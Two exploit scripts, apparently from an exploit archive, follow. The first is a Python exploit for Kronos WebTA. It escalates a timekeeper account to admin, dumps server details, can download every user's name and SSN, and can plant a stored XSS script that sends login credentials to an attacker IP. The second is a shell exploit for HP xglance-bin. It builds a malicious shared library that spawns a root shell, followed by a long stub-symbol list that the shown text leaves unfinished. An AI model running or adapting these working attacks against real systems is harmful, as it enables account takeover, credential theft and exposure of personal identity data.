#  Exploit Title: Kronos WebTA 4.0 - Authenticated Remote Privilege Escalation
#  Discovered by: Elwood Buck & Nolan B. Kennedy of Mindpoint Group
#  Exploit Author: Nolan B. Kennedy (nxkennedy)
#  Discovery date: 2019-09-20
#  Vendor Homepage: https://www.kronos.com/products/kronos-webta
#  Version: 3.8.x - 4.0 affected. (Exploit tested on v3.8.6.79029)
#  Tested on: Linux
#  CVE: (Remote Privesc) CVE-2020-8495 | (Stored XSS) CVE-2020-8493
#  Usage: python3 exploit.py http://target

#!/usr/bin/env python3

###
# *Exploit requires credentials with Timekeeper or Supervisor privileges
#
# Exploit abuses delegation privs present in the WebTA "/servlet/com.threeis.webta.H491delegate"
# servlet. By specifying the "delegate" and "delegatorUserId" parameter an attacker can use an
# admin user id to delegate role 5 (aka admin privs) to any other known user id, including oneself.
#
# selFunc=add&selRow=&delegate=<ATTACKER>&delegateRole=5&delegatorEmpId=1234&delegatorUserId=<ADMIN>
#
# With our new admin account, we can abuse a stored XSS vulnerability present in the login page,
# banner (displayed on every page) & password reset page. We can also pull system information and
# download a file containing the FULL NAME AND SSN OF EVERY USER in the database (typically thousands).
#
#
# Below is an example of the exploit output:
#####
# [+] Logged in as 'TESTER' with roles: Employee, Timekeeper
#
# [+] Available Admin Accounts:
# MOTOKO
# BATOU
# TOGUSA
# ISHIKAWA
#
# [-] Attempting to use account 'MOTOKO' to delegate Admin privs to 'TESTER'...
#
# [+] 'TESTER' successfully elevated to Admin privs :)
#
#
# [+] Logged in as 'TESTER' with roles: Employee, Timekeeper, Admin
#
# [+] Webta Version Information
# Site parameter: company
# Licensed modules:WEBTA-LEAVE, WEBTA, WEBTA
# webTA Servlet Version: 3.8.6.79029
# webTA Database Version: 3.8.6.79029
# App Server OS: Linux version 3.10.0-1062.1.1.el7.x86_64 (amd64)
# App Server JDK Version: Oracle Corporation version 1.8.0_222
# App Server Servlet Engine: Apache Tomcat/7.0.76 (Servlet API 3.0)
# App Server JDBC Driver: Oracle JDBC driver version 11.2.0.4.0
# Database Version:  Oracle JDBC driver version 11.2.0.4.0
# Database Connection: jdbc:oracle:thin:@//foo.rds.amazonaws.com:1521/webtadb<br>connected as user WEBTASVC
#
# [-] Downloading names and SSNs...
#
# [+] Complete. 5020 users written to file 'WebTA-PII.xls'
# [+] Sample Content:
# USERID,Last Name,First Name,Middle Name,SSN,Supervisor ID,Timekeeper ID,Organization,Pay Period,Active Status,
# MOTOKO,Kusanagi,Major,M.,987-65-4321,ARAMAKI,ARAMAKI,SECTION9,19,Active,
#
# [+] Stored XSS attack complete :)
#####

import re
from requests import Request, Session
from sys import argv, exit




banner = """###
#  Kronos WebTA 3.8.x - 4.0 Authenticated Remote Privilege Escalation & Stored XSS Exploit
#  Discovered by: Elwood Buck & Nolan B. Kennedy of Mindpoint Group
#  Exploit Author: Nolan B. Kennedy (nxkennedy)
#  Discovery date: 20 SEPT 2019
#  Vendor Homepage: https://www.kronos.com/products/kronos-webta
#  Version: 3.8.x - 4.0 affected. (Exploit tested on v3.8.6.79029)
#  Tested on: Linux
#  CVE: (Remote Privesc) CVE-2020-8494 | (Stored XSS) CVE-2020-8493
#  Usage: python3 exploit.py http://target
###"""
base_url = argv[1]
username = "TESTER"
password = "password!1234"
# set to True if you want to also exploit Stored XSS
xss = False
# xss strings can be injected into 3 different 'banner' locations (feel free to modify content)
# WILL NOT ERASE CONTENT ALREADY IN APPLICATION
xss_login_page = """
<script>
/* steals login creds each time a user logs in and forwards them to attacker ip */

var attacker = "192.168.1.3";

/* don't forget to set up a listener (python3 -m http.server 80) */
function stealCreds() {
        var username = document.frm[1].value;
        var password = document.frm[2].value;
        img = new Image();
        img.src = "http://"+attacker+"/?"+ "username=" +username+ "&" + "password=" +escape(password);
        setTimeout('document.frm.submit();', 1000);
        return false;
        }

function readyToSteal() {
	document.frm.onsubmit = stealCreds;
	}

/* special for WebTA because otherwise the script loads before the DOM and password form */
document.addEventListener("DOMContentLoaded", readyToSteal);
</script>
"""
xss_banner_everypage = ""
xss_passwordchange_page = ""
s = Session()
adm_list = []



def web_req(url, data):
	print()
	req = Request('POST', url, data=data)
	prepared = s.prepare_request(req)
	resp = s.send(prepared, allow_redirects=True, verify=False)
	return resp



def killActiveSession():
	url = base_url + "/servlet/com.threeis.webta.H111multipleLogin"
	data = {"selFunc":"continue"}
	resp = web_req(url, data)



def checkPrivs():
	url = base_url + "/servlet/com.threeis.webta.HGateway"
	data = {}
	resp = web_req(url, data)
	html = resp.text
	activeSession = roles = re.findall(r'(.*?)You have an active session open at a another browser(.*?)\.', html)
	roles = re.findall(r'(.*?)type\="button"(.*?)>', html)
	if activeSession:
		print("[-] Killing active session...")
		killActiveSession()
		login()
	elif roles:
		roles_list = []
		for role in roles:
			role = role[1].split('"')[1]
			roles_list.append(role)
		print("[+] Logged in as '{}' with roles: {}".format(username, ', '.join(roles_list)))

	else:
		print("[!] Account does not have required Timekeeper or Supervisor privs")
		exit()



def login():
	url = base_url + "/servlet/com.threeis.webta.H110login"
	data = {"j_username": username, "j_password": password, "login": "++Log+In++"}
	resp = web_req(url, data)
	if resp.status_code != 200:
		print("[!] Failed to log in as '{}'".format(username))
		exit()
	checkPrivs()



def findAdmins():
	url = base_url + "/servlet/com.threeis.webta.H940searchUser"
	data = {
        "selFunc":"search",
        "return_page":"com.threeis.webta.P491delegate",
        "return_variable":"delegate",
        "search_org":"0",
        "search_role":"Administrator",
        "actingRole":"2",
        "payload_name_0":"selFunc",
        "payload_val_0":"search",
        "payload_name_1":"selRow",
        "payload_name_2":"delegate",
        "payload_name_3":"delegateRole",
        "payload_val_3":"2",
        "payload_name_4":"delegatorEmpId",
        "payload_val_4":"15667", # might need a valid user id
        "payload_name_5":"delegatorUserId",
        "payload_val_5":username,
        }
	resp = web_req(url, data)
	html = resp.text
	adm_usrs = re.findall(r'<TD CLASS\="bckGray">(.*?)\n', html)
	print("[+] Available Admin Accounts:")
	for snip in adm_usrs:
        	adm = snip.split('</TD><TD CLASS="bckGray">')[2]
        	adm_list.append(adm)
        	print(adm)



def privesc():
	url = base_url + "/servlet/com.threeis.webta.H491delegate"
	data = {
	"selFunc":"add",
	"delegate":username,
	"delegateRole":"5",
	"delegatorEmpId":"1234",
	"delegatorUserId":adm_list[0],
	}
	print()
	print("[-] Attempting to use account '{}' to delegate Admin privs to '{}'...".format(adm_list[0], username))
	resp = web_req(url, data)
	print("[+] '{}' successfully elevated to Admin privs :)".format(username))



def storeXSS():
	url = base_url + "/servlet/com.threeis.webta.H261configMenu"
	data = {'selFunc':'messages'}
	### to be covert we want to append our js to the end of * messages/banners already there *
	resp = web_req(url, data)
	html = resp.text
	messages = re.findall(r'<TEXTAREA name\=(.*?)</textarea>', html, re.DOTALL)
	messages_clean = []
	for message in messages:
		message = message.split('wrap="virtual">')[1]
		messages_clean.append(message)
	login_page = messages_clean[0]
	banner_everypage = messages_clean[1]
	passwordchange_page = messages_clean[2]

	###  now we inject our javascript
	url = base_url + "/servlet/com.threeis.webta.H201config"
	data = {
		"selFunc":"save",
		"loginMessage": login_page + xss_login_page,
		"bannerMessage": banner_everypage + xss_banner_everypage,
		"passwordMessage": passwordchange_page + xss_passwordchange_page,
	}
	resp = web_req(url, data)
	print("[+] Stored XSS attack complete :)")



def stealPII():
	url = base_url + "/servlet/com.threeis.webta.H287userRoleReport"
	data = {
	"selFunc":"downloademp",
	"roletype":"1",
	"orgsel":"0",
	"pageNum":"1",
	}
	print("[-] Downloading names and SSNs...")
	resp = web_req(url, data)
	filename = "WebTA-PII.xls"
	with open(filename, 'wb') as f:
		f.write(resp.content)
	with open(filename) as f:
		for i, l in enumerate(f):
			pass
	count = i # does not include header
	print("[+] Complete. {} users written to file '{}'".format(count, filename))
	print("[+] Sample Content:")
	with open(filename) as f:
		for n in range(2):
			print(",".join(f.readline().split("\t")), end="")



def dumpSysInfo():
	url = base_url + "/servlet/com.threeis.webta.H200mnuAdmin"
	data = {"selFunc":"about"}
	resp = web_req(url, data)
	html = resp.text
	data = re.findall(r'<INPUT VALUE\="(.*?)"', html, re.DOTALL)
	print("[+] " + data[0])



if __name__ == '__main__':
	print(banner)
	login()
	findAdmins()
	privesc()
	login() # login again because we need the refreshed perms after privesc
	dumpSysInfo()
	#stealPII()
	if xss:
		storeXSS()
	s.close()
            
# Exploit Title: xglance-bin 11.00 - Privilege Escalation
# Exploit Author: Robert Jaroszuk and Marco Ortisi (RedTimmy Security)
# Date: 2020-02-01
# Tested on: RHEL 5.x/6.x/7.x/8.x
# CVE: CVE-2014-2630
# Disclaimer: This exploit is for educational purposes only
# More details on https://redtimmysec.wordpress.com/2020/02/04/perf-exploiter/
#

#!/bin/sh

echo "[*] Hewlett-Packard Performance Monitoring for Open System Environments exploit by Robert Jaroszuk and Marco Ortisi (RedTimmy Security)"
echo
echo "[+] Preparing the code..."

cat > lib.c << DONE

#define _GNU_SOURCE
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#include <stdio.h>
#include <dlfcn.h>

void __cxa_finalize (void *d) {
    return;
}

void __attribute__((constructor)) init() {
    setresuid(geteuid(), geteuid(), geteuid());
    printf("Hewlett-Packard Performance Monitoring for Open System Environments exploit by Robert Jaroszuk and Marco Ortisi (RedTimmy Security)\n");
    printf("CVE-2014-2630\n");
    fflush(stdout);
    execl("/bin/sh", (char *)NULL, (char *)NULL);
}

int applicationShellClassRec = 0;
int applicationShellWidgetClass = 0;
int colorConvertArgs = 0;
int compositeWidgetClass = 0;
int constraintClassRec = 0;
int constraintWidgetClass = 0;
int coreWidgetClass = 0;
int dump_external = 0;
int dump_fontlist = 0;
int dump_fontlist_cache = 0;
int dump_internal = 0;
int FcPatternAddInteger = 0;
int FcPatternAddString = 0;
int FcPatternCreate = 0;
int FcPatternDestroy = 0;
int GetWidgetNavigPtrs = 0;
int InitializeScrollBars = 0;
int _ITM_deregisterTMCloneTable = 0;
int _ITM_registerTMCloneTable = 0;
int jpeg_calc_output_dimensions = 0;
int jpeg_CreateDecompress = 0;
int jpeg_destroy_decompress = 0;
int jpeg_finish_decompress = 0;
int jpeg_read_header = 0;
int jpeg_read_scanlines = 0;
int jpeg_start_decompress = 0;
int jpeg_std_error = 0;
int jpeg_stdio_src = 0;
int load_jpeg = 0;
int localeconv = 0;
int __longjmp_chk = 0;
int nl_langinfo = 0;
int NumLockMask = 0;
int objectClass = 0;
int objectClassRec = 0;
int overrideShellClassRec = 0;
int png_create_info_struct = 0;
int png_create_read_struct = 0;
int png_destroy_read_struct = 0;
int png_get_channels = 0;
int png_get_gAMA = 0;
int png_get_IHDR = 0;
int png_get_rowbytes = 0;
int png_get_valid = 0;
int png_init_io = 0;
int png_read_end = 0;
int png_read_image = 0;
int png_read_info = 0;
int png_read_update_info = 0;
int png_set_expand = 0;
int png_set_gamma = 0;
int png_set_gray_to_rgb = 0;
int png_set_longjmp_fn = 0;
int png_set_sig_bytes = 0;
int png_set_strip_16 = 0;
int png_sig_cmp = 0;
int rectObjClass = 0;
int rectObjClassRec = 0;
int ScrollLockMask = 0;
int SetMwmStuff = 0;
int T = 0;
int topLevelShellWidgetClass = 0;
int transientShellClassRec = 0;
int transientShellWidgetClass = 0;
int V = 0;
int vendorShellClassRec = 0;
int vendorShellWidgetClass = 0;
int W = 0;
int __wctomb_chk = 0;
int widgetClass = 0;
int widgetClassRec = 0;
int wmShellClassRec = 0;
int wmShellWidgetClass = 0;
int XAddExtension = 0;
int XAllocColor = 0;
int XAllocColorCells = 0;
int XAllowEvents = 0;
int XBell = 0;
int XChangeActivePointerGrab = 0;
int XChangeGC = 0;
int XChangeProperty = 0;
int XChangeWindowAttributes = 0;
int XCheckIfEvent = 0;
int XCheckMaskEvent = 0;
int XClearArea = 0;
int XClearWindow = 0;
int XCloseDisplay = 0;
int XCloseIM = 0;
int XConfigureWindow = 0;
int XConvertSelection = 0;
int XCopyArea = 0;
int XCopyPlane = 0;
int XCreateBitmapFromData = 0;
int XCreateFontCursor = 0;
int XCreateGC = 0;
int XCreateIC = 0;
int XCreateImage = 0;
int XCreatePixmap = 0;
int XCreatePixmapCursor = 0;
int XCreatePixmapFromBitmapData = 0;
int XCreateRegion = 0;
int XCreateWindow = 0;
int XDefaultColormap = 0;
int XDefaultDepth = 0;
int XDefaultScreen = 0;
int XDefaultVisual = 0;
int XDefineCursor = 0;
int XDeleteContext = 0;
int XDeleteProperty = 0;
int XDestroyIC = 0;
int XDestroyRegion = 0;
int XDestroyWindow = 0;
int XDisplayKeycodes = 0;
int XDisplayOfScreen = 0;
int XDisplayString = 0;
int XDrawArc = 0;
int XDrawImageString = 0;
int XDrawImageString16 = 0;
int XDrawLine = 0;
int XDrawLines = 0;
int XDrawPoint = 0;
int XDrawRectangle = 0;
int XDrawSegments = 0;
int XDrawString = 0;
int XDrawString16 = 0;
int _XEditResGet16 = 0;
int _XEditResGet32 = 0;
int _XEditResGet8 = 0;
int _XEditResGetSigned16 = 0;
int _XEditResGetString8 = 0;
int _XEditResGetWidgetInfo = 0;
int _XEditResPut16 = 0;
int _XEditResPut32 = 0;
int _XEditResPut8 = 0;
int _XEditResPutString8 = 0;
int _XEditResPutWidgetInfo = 0;
int _XEditResResetStream = 0;
int XEmptyRegion = 0;
int XEqualRegion = 0;
int XESetCloseDisplay = 0;
int XExtentsOfFontSet = 0;
int XFetchBuffer = 0;
int XFillArc = 0;
int XFillPolygon = 0;
int XFillRectangle = 0;
int XFillRectangles = 0;
int XFindContext = 0;
int XFlush = 0;
int XFontsOfFontSet = 0;
int XFree = 0;
int XFreeColors = 0;
int XFreeCursor = 0;
int XFreeFont = 0;
int XFreeFontNames = 0;
int XFreeGC = 0;
int XFreeModifiermap = 0;
int XFreePixmap = 0;
int XFreeStringList = 0;
int XftDrawCreate = 0;
int XftDrawCreateBitmap = 0;
int XftDrawDestroy = 0;
int XftDrawRect = 0;
int XftDrawSetClip = 0;
int XftDrawSetClipRectangles = 0;
int XftDrawString16 = 0;
int XftDrawString32 = 0;
int XftDrawStringUtf8 = 0;
int XftFontClose = 0;
int XftFontMatch = 0;
int XftFontOpenPattern = 0;
int XftTextExtents16 = 0;
int XftTextExtents32 = 0;
int XftTextExtents8 = 0;
int XftTextExtentsUtf8 = 0;
int XGetAtomName = 0;
int XGetFontProperty = 0;
int XGetGCValues = 0;
int XGetGeometry = 0;
int XGetICValues = 0;
int XGetImage = 0;
int XGetIMValues = 0;
int XGetInputFocus = 0;
int XGetKeyboardMapping = 0;
int XGetModifierMapping = 0;
int XGetOCValues = 0;
int XGetOMValues = 0;
int XGetSelectionOwner = 0;
int XGetWindowAttributes = 0;
int XGetWindowProperty = 0;
int XGetWMColormapWindows = 0;
int XGrabKeyboard = 0;
int XGrabPointer = 0;
int XGrabServer = 0;
int XHeightOfScreen = 0;
int xiColumnConstraintExtension = 0;
int XiCreateStippledPixmap = 0;
int _XiGetTabIndex = 0;
int XIMOfIC = 0;
int XInstallColormap = 0;
int XInternAtom = 0;
int XInternAtoms = 0;
int XIntersectRegion = 0;
int XiReleaseStippledPixmap = 0;
int _XiResolveAllPartOffsets = 0;
int XiResolveAllPartOffsets = 0;
int XKeysymToKeycode = 0;
int XKeysymToString = 0;
int XLastKnownRequestProcessed = 0;
int XListFonts = 0;
int XListInstalledColormaps = 0;
int XLoadQueryFont = 0;
int XLookupString = 0;
int Xm18IListUnselectAllItems = 0;
int Xm18IListUnselectItem = 0;
int _XmAccessColorData = 0;
int XmActivateProtocol = 0;
int _XmAddCallback = 0;
int _XmAddGrab = 0;
int _XmAddHashEntry = 0;
int XmAddProtocolCallback = 0;
int XmAddProtocols = 0;
int _Xm_AddQueue = 0;
int XmAddTabGroup = 0;
int _XmAddTearOffEventHandlers = 0;
int _XmAddToColorCache = 0;
int XmAddToPostFromList = 0;
int _XmAllocHashTable = 0;
int _XmAllocMotifAtom = 0;
int _XmAllocReceiverInfo = 0;
int _XmAllocScratchPixmap = 0;
int _XmAllowAcceleratedInsensitiveUnmanagedMenuItems = 0;
int XMapRaised = 0;
int XMapWindow = 0;
int _XmArrowB_defaultTranslations = 0;
int xmArrowButtonClassRec = 0;
int xmArrowButtonGadgetClass = 0;
int xmArrowButtonGadgetClassRec = 0;
int xmArrowButtonWidgetClass = 0;
int _XmArrowPixmapCacheCompare = 0;
int _XmArrowPixmapCacheDelete = 0;
int _XmAssignInsensitiveColor = 0;
int _XmAssignLabG_MarginBottom = 0;
int _XmAssignLabG_MarginHeight = 0;
int _XmAssignLabG_MarginLeft = 0;
int _XmAssignLabG_MarginRight = 0;
int _XmAssignLabG_MarginTop = 0;
int _XmAssignLabG_MarginWidth = 0;
int XMaxRequestSize = 0;
int _XmBackgroundColorDefault = 0;
int _XmBaseClassPartInitialize = 0;
int _XmBB_CreateButtonG = 0;
int _XmBB_CreateLabelG = 0;
int _XmBB_GetDialogTitle = 0;
int _XmBBUpdateDynDefaultButton = 0;
int XmbDrawImageString = 0;
int XmbDrawString = 0;
int _XmBlackPixel = 0;
int XmbLookupString = 0;
int _XmBottomShadowColorDefault = 0;
int XmbResetIC = 0;
int XmbTextEscapement = 0;
int XmbTextExtents = 0;
int XmbTextListToTextProperty = 0;
int XmbTextPropertyToTextList = 0;
int _XmBuildExtResources = 0;
int _XmBuildGadgetResources = 0;
int _XmBuildManagerResources = 0;
int _XmBuildPrimitiveResources = 0;
int _XmBuildResources = 0;
int _XmBulletinB_defaultTranslations = 0;
int _XmBulletinBoardCancel = 0;
int xmBulletinBoardClassRec = 0;
int _XmBulletinBoardFocusMoved = 0;
int _XmBulletinBoardMap = 0;
int _XmBulletinBoardReturn = 0;
int _XmBulletinBoardSetDefaultShadow = 0;
int _XmBulletinBoardSetDynDefaultButton = 0;
int _XmBulletinBoardSizeUpdate = 0;
int xmBulletinBoardWidgetClass = 0;
int xmButtonBoxClassRec = 0;
int xmButtonBoxWidgetClass = 0;
int _XmButtonPopdownChildren = 0;
int _XmButtonTakeFocus = 0;
int _XmByteOrderChar = 0;
int _XmCacheCopy = 0;
int _XmCacheDelete = 0;
int _XmCachePart = 0;
int _XmCachePixmap = 0;
int _XmCalcLabelDimensions = 0;
int _XmCalcLabelGDimensions = 0;
int _XmCallCallbackList = 0;
int _XmCallFocusMoved = 0;
int _XmCallRowColumnMapCallback = 0;
int _XmCallRowColumnUnmapCallback = 0;
int _XmCascadeB_menubar_events = 0;
int _XmCascadeB_p_events = 0;
int _XmCascadeBPrimClassExtRec = 0;
int xmCascadeButtonClassRec = 0;
int xmCascadeButtonGadgetClass = 0;
int xmCascadeButtonGadgetClassRec = 0;
int XmCascadeButtonGadgetHighlight = 0;
int xmCascadeButtonGCacheObjClassRec = 0;
int XmCascadeButtonHighlight = 0;
int xmCascadeButtonWidgetClass = 0;
int _XmCascadingPopup = 0;
int _XmCBHelp = 0;
int _XmCBNameActivate = 0;
int _XmCBNameValueChanged = 0;
int XmChangeColor = 0;
int _XmChangeHSB = 0;
int _XmChangeNavigationType = 0;
int _XmChangeVSB = 0;
int _XmCharsetCanonicalize = 0;
int _XmCleanPixmapCache = 0;
int _XmClearBCompatibility = 0;
int _XmClearBGCompatibility = 0;
int _XmClearBGPixmapName = 0;
int _XmClearBorder = 0;
int _XmClearDisplayTables = 0;
int _XmClearDragReceiverInfo = 0;
int _XmClearFocusPath = 0;
int _XmClearIconPixmapName = 0;
int _XmClearKbdFocus = 0;
int _XmClearRect = 0;
int _XmClearShadowType = 0;
int _XmClearTabGroup = 0;
int _XmClearTraversal = 0;
int XmClipboardBeginCopy = 0;
int XmClipboardCancelCopy = 0;
int XmClipboardCopy = 0;
int XmClipboardCopyByName = 0;
int XmClipboardEndCopy = 0;
int XmClipboardEndRetrieve = 0;
int XmClipboardInquireCount = 0;
int XmClipboardInquireFormat = 0;
int XmClipboardInquireLength = 0;
int XmClipboardInquirePendingItems = 0;
int XmClipboardLock = 0;
int _XmClipboardPassType = 0;
int XmClipboardRegisterFormat = 0;
int XmClipboardRetrieve = 0;
int XmClipboardStartCopy = 0;
int XmClipboardStartRetrieve = 0;
int XmClipboardUndoCopy = 0;
int XmClipboardUnlock = 0;
int XmClipboardWithdrawFormat = 0;
int xmClipWindowClassRec = 0;
int _XmClipWindowTranslationTable = 0;
int xmClipWindowWidgetClass = 0;
int _XmColorObjCache = 0;
int _XmColorObjCacheDisplay = 0;
int xmColorObjClass = 0;
int xmColorObjClassRec = 0;
int _XmColorObjCreate = 0;
int xmColorSelectorClassRec = 0;
int xmColorSelectorWidgetClass = 0;
int xmColumnClassRec = 0;
int xmColumnWidgetClass = 0;
int xmCombinationBox2ClassRec = 0;
int XmCombinationBox2GetArrow = 0;
int XmCombinationBox2GetChild = 0;
int XmCombinationBox2GetLabel = 0;
int XmCombinationBox2GetList = 0;
int XmCombinationBox2GetText = 0;
int XmCombinationBox2GetValue = 0;
int xmCombinationBox2WidgetClass = 0;
int XmCombinationBoxGetValue = 0;
int XmComboBoxAddItem = 0;
int xmComboBoxClassRec = 0;
int _XmComboBox_defaultAccelerators = 0;
int _XmComboBox_defaultTranslations = 0;
int XmComboBoxDeletePos = 0;
int _XmComboBox_dropDownComboBoxAccelerators = 0;
int _XmComboBox_dropDownListTranslations = 0;
int XmComboBoxSelectItem = 0;
int XmComboBoxSetItem = 0;
int _XmComboBox_textFocusTranslations = 0;
int XmComboBoxUpdate = 0;
int xmComboBoxWidgetClass = 0;
int XmCommandAppendValue = 0;
int xmCommandClassRec = 0;
int XmCommandError = 0;
int XmCommandGetChild = 0;
int _XmCommandReturn = 0;
int XmCommandSetValue = 0;
int _XmCommandUpOrDown = 0;
int xmCommandWidgetClass = 0;
int XmCompareISOLatin1 = 0;
int XmCompareXtWidgetGeometry = 0;
int XmCompareXtWidgetGeometryToWidget = 0;
int _XmComputeVisibilityRect = 0;
int _XmConfigureObject = 0;
int _XmConfigureWidget = 0;
int xmContainerClassRec = 0;
int XmContainerCopy = 0;
int XmContainerCopyLink = 0;
int XmContainerCut = 0;
int _XmContainer_defaultTranslations = 0;
int XmContainerGetItemChildren = 0;
int XmContainerPaste = 0;
int XmContainerPasteLink = 0;
int XmContainerRelayout = 0;
int XmContainerReorder = 0;
int _XmContainer_traversalTranslations = 0;
int xmContainerWidgetClass = 0;
int _XmConvertActionParamToRepTypeId = 0;
int _XmConvertComplete = 0;
int _XmConvertCSToString = 0;
int _XmConvertFactor = 0;
int _XmConvertFloatUnitsToIntUnits = 0;
int _XmConvertHandler = 0;
int _XmConvertHandlerSetLocal = 0;
int _XmConvertStringToUnits = 0;
int XmConvertStringToUnits = 0;
int _XmConvertToBW = 0;
int _XmConvertUnits = 0;
int XmConvertUnits = 0;
int _XmCopyCursorIconQuark = 0;
int XmCopyISOLatin1Lowered = 0;
int _XmCountVaList = 0;
int XmCreateArrowButton = 0;
int XmCreateArrowButtonGadget = 0;
int _XmCreateArrowPixmaps = 0;
int XmCreateBulletinBoard = 0;
int XmCreateBulletinBoardDialog = 0;
int XmCreateButtonBox = 0;
int XmCreateCascadeButton = 0;
int XmCreateCascadeButtonGadget = 0;
int XmCreateColorSelector = 0;
int XmCreateColumn = 0;
int XmCreateCombinationBox2 = 0;
int XmCreateComboBox = 0;
int XmCreateCommand = 0;
int XmCreateCommandDialog = 0;
int XmCreateContainer = 0;
int XmCreateDataField = 0;
int XmCreateDialogShell = 0;
int XmCreateDragIcon = 0;
int XmCreateDrawingArea = 0;
int XmCreateDrawnButton = 0;
int XmCreateDropDown = 0;
int XmCreateDropDownComboBox = 0;
int XmCreateDropDownList = 0;
int XmCreateErrorDialog = 0;
int XmCreateExt18List = 0;
int XmCreateExtended18List = 0;
int XmCreateFileSelectionBox = 0;
int XmCreateFileSelectionDialog = 0;
int _XmCreateFocusData = 0;
int XmCreateFontSelector = 0;
int XmCreateForm = 0;
int XmCreateFormDialog = 0;
int XmCreateFrame = 0;
int XmCreateGrabShell = 0;
int XmCreateIconBox = 0;
int XmCreateIconButton = 0;
int XmCreateIconGadget = 0;
int XmCreateIconHeader = 0;
int XmCreateInformationDialog = 0;
int XmCreateLabel = 0;
int XmCreateLabelGadget = 0;
int XmCreateList = 0;
int XmCreateMainWindow = 0;
int XmCreateMenuBar = 0;
int _XmCreateMenuCursor = 0;
int XmCreateMenuShell = 0;
int XmCreateMessageBox = 0;
int XmCreateMessageDialog = 0;
int XmCreateMultiList = 0;
int XmCreateNotebook = 0;
int XmCreateOptionMenu = 0;
int XmCreateOutline = 0;
int XmCreatePaned = 0;
int XmCreatePanedWindow = 0;
int XmCreatePopupMenu = 0;
int XmCreatePromptDialog = 0;
int XmCreatePulldownMenu = 0;
int XmCreatePushButton = 0;
int XmCreatePushButtonGadget = 0;
int XmCreateQuestionDialog = 0;
int XmCreateRadioBox = 0;
int _XmCreateRenderTable = 0;
int _XmCreateRendition = 0;
int XmCreateRowColumn = 0;
int XmCreateScale = 0;
int XmCreateScrollBar = 0;
int XmCreateScrolledList = 0;
int XmCreateScrolledText = 0;
int XmCreateScrolledWindow = 0;
int XmCreateSelectionBox = 0;
int XmCreateSelectionDialog = 0;
int XmCreateSeparator = 0;
int XmCreateSeparatorGadget = 0;
int XmCreateSimpleCheckBox = 0;
int XmCreateSimpleMenuBar = 0;
int XmCreateSimpleOptionMenu = 0;
int XmCreateSimplePopupMenu = 0;
int XmCreateSimplePulldownMenu = 0;
int XmCreateSimpleRadioBox = 0;
int XmCreateSimpleSpinBox = 0;
int XmCreateSpinBox = 0;
int _XmCreateTab = 0;
int XmCreateTabBox = 0;
int _XmCreateTabList = 0;
int XmCreateTabStack = 0;
int XmCreateTemplateDialog = 0;
int XmCreateText = 0;
int XmCreateTextField = 0;
int XmCreateToggleButton = 0;
int XmCreateToggleButtonGadget = 0;
int XmCreateTree = 0;
int _XmCreateVisibilityRect = 0;
int XmCreateWarningDialog = 0;
int XmCreateWorkArea = 0;
int XmCreateWorkingDialog = 0;
int XmCvtByteStreamToXmString = 0;
int XmCvtCTToXmString = 0;
int XmCvtFromHorizontalPixels = 0;
int XmCvtFromVerticalPixels = 0;
int XmCvtStringToUnitType = 0;
int XmCvtTextPropertyToXmStringTable = 0;
int XmCvtTextToXmString = 0;
int XmCvtToHorizontalPixels = 0;
int XmCvtToVerticalPixels = 0;
int XmCvtXmStringTableToTextProperty = 0;
int XmCvtXmStringToByteStream = 0;
int _XmCvtXmStringToCT = 0;
int XmCvtXmStringToCT = 0;
int XmCvtXmStringToText = 0;
int _XmCvtXmStringToUTF8String = 0;
int XmCvtXmStringToUTF8String = 0;
int _XmDataF_EventBindings1 = 0;
int _XmDataF_EventBindings2 = 0;
int _XmDataF_EventBindings3 = 0;
int _XmDataF_EventBindings4 = 0;
int xmDataFieldClassRec = 0;
int _XmDataFieldConvert = 0;
int XmDataFieldCopy = 0;
int _XmDataFieldCountBytes = 0;
int XmDataFieldCut = 0;
int _XmDataFieldDeselectSelection = 0;
int XmDataFielddf_ClearSelection = 0;
int _XmDataFielddf_SetCursorPosition = 0;
int XmDataFielddf_SetCursorPosition = 0;
int _XmDataFielddf_SetDestination = 0;
int _XmDataFieldDrawInsertionPoint = 0;
int XmDataFieldGetAddMode = 0;
int XmDataFieldGetBaseline = 0;
int XmDataFieldGetCursorPosition = 0;
int _XmDataFieldGetDropReciever = 0;
int XmDataFieldGetEditable = 0;
int XmDataFieldGetInsertionPosition = 0;
int XmDataFieldGetLastPosition = 0;
int XmDataFieldGetMaxLength = 0;
int XmDataFieldGetSelection = 0;
int XmDataFieldGetSelectionPosition = 0;
int XmDataFieldGetSelectionWcs = 0;
int XmDataFieldGetString = 0;
int XmDataFieldGetStringWcs = 0;
int XmDataFieldGetSubstring = 0;
int XmDataFieldGetSubstringWcs = 0;
int XmDataFieldInsert = 0;
int XmDataFieldInsertWcs = 0;
int _XmDataFieldLoseSelection = 0;
int XmDataFieldPaste = 0;
int XmDataFieldPosToXY = 0;
int XmDataFieldRemove = 0;
int XmDataFieldReplace = 0;
int _XmDataFieldReplaceText = 0;
int XmDataFieldReplaceWcs = 0;
int XmDataFieldSetAddMode = 0;
int _XmDataFieldSetClipRect = 0;
int XmDataFieldSetEditable = 0;
int XmDataFieldSetHighlight = 0;
int XmDataFieldSetInsertionPosition = 0;
int XmDataFieldSetMaxLength = 0;
int _XmDataFieldSetSel2 = 0;
int XmDataFieldSetSelection = 0;
int XmDataFieldSetString = 0;
int XmDataFieldShowPosition = 0;
int _XmDataFieldStartSelection = 0;
int xmDataFieldWidgetClass = 0;
int XmDataFieldXYToPos = 0;
int _XmDataFPrimClassExtRec = 0;
int _XmDataFToggleCursorGC = 0;
int XmDeactivateProtocol = 0;
int _XmDefaultColorObj = 0;
int _XmDefaultDragIconQuark = 0;
int _XmdefaultTextActionsTable = 0;
int _XmdefaultTextActionsTableSize = 0;
int _XmDefaultVisualResources = 0;
int xmDesktopClass = 0;
int xmDesktopClassRec = 0;
int xmDesktopObjectClass = 0;
int _XmDestinationHandler = 0;
int _XmDestroyDefaultDragIcon = 0;
int _XmDestroyFocusData = 0;
int _XmDestroyMotifWindow = 0;
int _XmDestroyParentCallback = 0;
int XmDestroyPixmap = 0;
int _XmDestroyTearOffShell = 0;
int xmDialogShellClassRec = 0;
int xmDialogShellExtClassRec = 0;
int xmDialogShellExtObjectClass = 0;
int xmDialogShellWidgetClass = 0;
int _XmDifferentBackground = 0;
int _XmDirectionDefault = 0;
int XmDirectionMatch = 0;
int XmDirectionMatchPartial = 0;
int XmDirectionToStringDirection = 0;
int _XmDismissTearOff = 0;
int _XmDispatchGadgetInput = 0;
int _XmDisplay_baseTranslations = 0;
int xmDisplayClass = 0;
int xmDisplayClassRec = 0;
int xmDisplayObjectClass = 0;
int _XmDoGadgetTraversal = 0;
int XmDragCancel = 0;
